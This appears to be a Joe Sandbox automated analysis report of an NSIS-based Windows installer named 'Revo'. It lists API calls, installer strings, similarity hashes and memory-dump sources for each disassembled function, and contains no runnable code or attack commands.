Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\
• API String ID: 2531174081-3830878547
• Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
• Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
• Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68

Control-flow Graph
APIs
• lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017D5
• CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\PACK.EXE,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017FA
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
  • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE$C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dll
• API String ID: 1941528284-364468337
• Opcode ID: e754ad755ac4ebc946d1f76660a4366266a33e6d35abd67097047bb5803dd91e
• Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
• Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

Control-flow Graph
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
  • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
• Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
• Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
• Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58

Control-flow Graph

(control-flow graph of the function at 00403053; node and edge list omitted)
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 0040306E
• GetTickCount.KERNEL32 ref: 0040308C
• wsprintfW.USER32 ref: 004030BA
  • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
• CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
• ShowWindow.USER32(00000000,00000005), ref: 004030EC
  • Part of subcall function 00403037: MulDiv.KERNEL32(00003F10,00000064,00006606), ref: 0040304C
Strings
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
• Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
• Opcode Fuzzy Hash: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
• Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF

Control-flow Graph

(control-flow graph of the function at 00402FB8; node and edge list omitted)
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
• wsprintfW.USER32 ref: 0040300A
• SetWindowTextW.USER32(?,?), ref: 0040301A
• SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
Strings
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
• Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
• Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
• Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99

Control-flow Graph

(control-flow graph of the function at 00402975; node and edge list omitted)
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
• GlobalFree.KERNEL32(?), ref: 00402A2B
• GlobalFree.KERNELBASE(00000000), ref: 00402A3E
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
• Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
• Opcode Fuzzy Hash: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
• Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68

Control-flow Graph

(control-flow graph of the function at 0040349E; node and edge list omitted)
APIs
• GetTickCount.KERNEL32 ref: 004034B2
  • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
• SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
• SetFilePointer.KERNEL32(00075088,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FilePointer$CountTick
• String ID: hA$B
• API String ID: 1092082344-3967375562
• Opcode ID: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
• Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
• Opcode Fuzzy Hash: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
• Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D
APIs
• lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
• wsprintfW.USER32 ref: 00404F78
• SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$H'D
• API String ID: 3540041739-2781796796
• Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
• Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
• Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
• Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
• wsprintfW.USER32 ref: 00406A78
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME
• API String ID: 2200240437-1106614640
• Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
• Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
• Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
• Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
APIs
• GetDlgItem.USER32(?,?), ref: 00401DBF
• GetClientRect.USER32(?,?), ref: 00401E0A
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
• DeleteObject.GDI32(00000000), ref: 00401E5E
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
• Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
• Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
• Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
• Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
• Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
• Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00002000,?,0041E658,0040A000,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$CallbackDispatcherFreeHandleLoadModuleTextUserWindowlstrcat
• String ID:
• API String ID: 719239633-0
• Opcode ID: 5de1fd10f3c34d91682e05c9c3a69af0ea4da51c711688d66b0c73311e70599a
• Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
• Opcode Fuzzy Hash: 5de1fd10f3c34d91682e05c9c3a69af0ea4da51c711688d66b0c73311e70599a
• Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
APIs
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
  • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
  • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
  • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
• lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 004060D2
• GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 004060E2
Strings
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: PgE
• API String ID: 3248276644-3220684765
• Opcode ID: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
• Instruction ID: 4bebfd15c2bd202af51862231bcf25e973859f7a9abf5f27d8efd0e3f4a0fce5
• Opcode Fuzzy Hash: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
• Instruction Fuzzy Hash: 21F07835084A6259E622B7360C05AAF25098F8232470B423FFC43B22C1DF3D8973D17E
APIs
• RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00004000,00000000,?,?,?,?,Remove folder: ,?,00000000,004067E1,80000002), ref: 004065B6
• RegCloseKey.KERNEL32(?), ref: 004065C1
Strings
Similarity
• API ID: CloseQueryValue
• String ID: Remove folder:
• API String ID: 3356406503-1958208860
• Opcode ID: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
• Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
• Opcode Fuzzy Hash: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
• Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
APIs
• GetTickCount.KERNEL32 ref: 004061DF
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
Strings
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
• Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
• Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
• Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
• Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
• Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
• Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                                                            • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                                                                                                                                            • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                                                            • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
